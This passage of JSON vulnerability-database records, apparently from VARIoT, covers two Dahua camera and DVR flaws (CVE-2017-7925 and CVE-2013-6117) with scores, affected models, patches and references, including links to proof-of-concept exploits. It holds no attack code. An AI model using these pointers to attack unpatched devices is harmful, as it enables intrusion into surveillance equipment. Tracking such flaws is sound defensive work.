            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2017-7925",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-08192",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-116128",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-7925",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-7925",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-08192",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201704-1045",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-116128",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. plural Dahua The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua DH-IPC-HDBW23A0RN-ZS is a camera product of Dahua Company of China. Dahua Technology is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. \nAttackers may exploit these issues to gain unauthorized access to restricted content by bypassing intended security restrictions or to obtain sensitive information that may aid in launching further attacks. Dahua DH-IPC-HDBW23A0RN-ZS, etc. There are security vulnerabilities in many Dahua products. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-7925",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-17-124-02",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "98312",
            "trust": 2.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU98841854",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "B9A8CA3D-8AC9-429C-880C-4CC25C09C01B",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "id": "VAR-201705-3743",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          }
        ],
        "trust": 1.5166666600000003
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:29:39.687000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cybersecurity Vulnerability Update - March 8 2017",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/en/us/single.php?nid=364"
          },
          {
            "title": "Security Notification DHCC-201703-01",
            "trust": 0.8,
            "url": "http://www1.dahuasecurity.com/annoucementsingle/security-notification-dhcc-201703-01-112.html"
          },
          {
            "title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (030617)",
            "trust": 0.8,
            "url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
          },
          {
            "title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (04032017)",
            "trust": 0.8,
            "url": "http://us.dahuasecurity.com/en/us/security-bulletin_04032017.php"
          },
          {
            "title": "Cybersecurity Statement - March 6th 2017",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/en/us/single.php?nid=354"
          },
          {
            "title": "Patches for Dahua\u0027s multiple digital video recorders and IP camera profile password vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/94425"
          },
          {
            "title": "Repair measures for various UOB product security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99754"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-522",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-264",
            "trust": 0.9
          },
          {
            "problemtype": "CWE-260",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-124-02"
          },
          {
            "trust": 2.3,
            "url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/98312"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7925"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7925"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu98841854/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor-poc.py"
          },
          {
            "trust": 0.8,
            "url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor.txt"
          },
          {
            "trust": 0.3,
            "url": "www.dahuasecurity.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-06-05T00:00:00",
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "date": "2017-06-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "date": "2017-05-06T00:00:00",
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "date": "2017-05-04T00:00:00",
            "db": "BID",
            "id": "98312"
          },
          {
            "date": "2017-06-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "date": "2017-05-06T00:29:00.427000",
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "date": "2017-04-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-06-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-116128"
          },
          {
            "date": "2017-05-23T16:23:00",
            "db": "BID",
            "id": "98312"
          },
          {
            "date": "2017-07-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "date": "2019-10-09T23:29:58.860000",
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Dahua Vulnerabilities related to authorization, authority, and access control in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "permissions and access control issues",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201407-0012

    Vulnerability from variot - Updated: 2023-12-18 12:21

    Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777. Dahua Security DVR Appliances is a digital video device developed by Dahua Technologies. Dahua Security DVR Appliances utilize thin clients such as PSS, mobile client interfaces such as iDMSS and the ActiveX control \"webrec.cab\" for access. These clients communicate with the management service (TCP 37777). An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Dahua DVR is a hard disk video recorder product of Dahua Company in China

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201407-0012",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "dvr",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "2.608.gv00.0"
          },
          {
            "model": "dvr",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "2.608.0000.0"
          },
          {
            "model": "dvr",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2.608.0000.0"
          },
          {
            "model": "dvr",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2.608.gv00.0"
          },
          {
            "model": "security dvr appliances",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2.608.0000.0"
          },
          {
            "model": "security dvr appliances 2.608.gv00.0",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dahua technology dvr appliances 2.608.gv00.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "",
            "version": null
          },
          {
            "model": "dahua technology dvr appliances",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "",
            "version": "2.608.0000.0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "BID",
            "id": "63742"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:dvr_firmware:2.608.0000.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:dvr_firmware:2.608.gv00.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jake Reynolds",
        "sources": [
          {
            "db": "BID",
            "id": "63742"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2013-6117",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2013-6117",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2013-14541",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-66119",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2013-6117",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2013-14541",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201311-262",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-66119",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2013-6117",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777. Dahua Security DVR Appliances is a digital video device developed by Dahua Technologies. Dahua Security DVR Appliances utilize thin clients such as PSS, mobile client interfaces such as iDMSS and the ActiveX control \\\"webrec.cab\\\" for access. These clients communicate with the management service (TCP 37777). \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Dahua DVR is a hard disk video recorder product of Dahua Company in China",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "BID",
            "id": "63742"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-66119",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=29673",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-6117",
            "trust": 3.5
          },
          {
            "db": "OSVDB",
            "id": "99783",
            "trust": 2.6
          },
          {
            "db": "PACKETSTORM",
            "id": "124022",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29673",
            "trust": 1.8
          },
          {
            "db": "BID",
            "id": "63742",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612",
            "trust": 0.8
